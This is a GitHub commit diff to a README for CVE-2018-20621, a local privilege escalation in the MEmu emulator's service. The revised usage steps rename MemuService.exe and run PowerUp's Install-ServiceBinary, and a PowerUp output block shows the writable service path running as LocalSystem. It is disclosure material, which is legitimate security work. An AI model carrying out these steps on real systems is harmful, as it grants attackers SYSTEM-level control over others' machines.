Skip to content

Commit

Permalink
Fix usage.
Browse files Browse the repository at this point in the history
  • Loading branch information
DaveYesland authored Jan 18, 2019
1 parent 6e82186 commit ee14578
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions CVE-2018-20621/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -16,7 +16,7 @@ The MemuService.exe service binary is vulnerable to local privilege escalation t


### Usage/Exploitation
Using PowerShellEmpire PowerUp `Install-ServiceBinary -Name 'MEmuSVC'`
Rename `C:\Program Files\Microvirt\MEmu\MemuService.exe` to `MemuService.exe.old`. Then using PowerShellEmpire PowerUp run `Install-ServiceBinary -Name 'MEmuSVC'`.

### Detail
```
Expand All @@ -28,4 +28,4 @@ ModifiableFileIdentityReference : Everyone
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'MEmuSVC'
CanRestart : False
```
```

0 comments on commit ee14578

Please sign in to comment.